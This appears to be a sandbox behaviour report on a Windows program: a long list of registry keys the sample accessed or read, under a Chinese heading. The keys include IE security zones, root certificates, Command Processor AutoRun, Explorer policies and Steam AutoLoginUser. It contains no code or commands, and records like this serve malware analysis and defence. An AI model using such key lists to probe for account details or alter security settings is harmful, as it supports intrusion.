  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_Cross_Domain_Redirect_Mitigation
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_Cross_Domain_Redirect_Mitigation
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchProviders\
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CrossDomain_Fix_KB867801
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CrossDomain_Fix_KB867801
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400
  • HKEY_CLASSES_ROOT\.js
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.js\Content Type
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1201
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1201
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}
  • HKEY_CLASSES_ROOT\.jpg
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.jpg\Content Type
  • HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Filter\image/jpeg
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\image/jpeg
  • HKEY_CLASSES_ROOT\.png
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.png\Content Type
  • HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Filter\image/png
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\image/png
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2000
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2000
  • HKEY_CURRENT_USER\Software\Microsoft\Ftp
  • HKEY_CURRENT_USER\Software\Microsoft\FTP\Use Web Based FTP
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Services
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Services
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Services\SelectionActivityButtonDisable
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Activities
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Activities
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Activities
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ACTIVEX_INACTIVATE_MODE_REMOVAL_REVERT
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ACTIVEX_INACTIVATE_MODE_REMOVAL_REVERT
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BINARY_CALLER_SERVICE_PROVIDER
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BINARY_CALLER_SERVICE_PROVIDER
  • HKEY_CURRENT_USER\Software\Valve\Steam
  • HKEY_CURRENT_USER\Software\Valve\Steam\AutoLoginUser
  • HKEY_CURRENT_USER\Software\Valve\Steam\Language
读取的注册表键
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8F43288AD272F3103B6FB1428485EA3014C0BCFE\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A7217F919843199C958C128449DD52D2723B0A8A\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D85213E038F309D02A40917B59E142368AE6B1C0\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DBB84423C928ABE889D0E368FC3191D151DDB1AB\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3679CA35668772304D30A5FB873B0FA77BB70D54\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3E2BF7F2031B96F38CE6C4D8A85D3E2D58476A0F\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JavaScript\CLSID\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\COM+Enabled
  • HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings\JITDebug
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\http\shell\open\command\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a4-1bd9-11e5-9838-806e6f6e6963}\Data
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a4-1bd9-11e5-9838-806e6f6e6963}\Generation
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
  • ApplicationIcon
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a3-1bd9-11e5-9838-806e6f6e6963}\Data
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a3-1bd9-11e5-9838-806e6f6e6963}\Generation
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000804
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\a
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
  • HKEY_CURRENT_USER\Control Panel\Personalization\(Default)
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh-Hans
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh-Hans
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
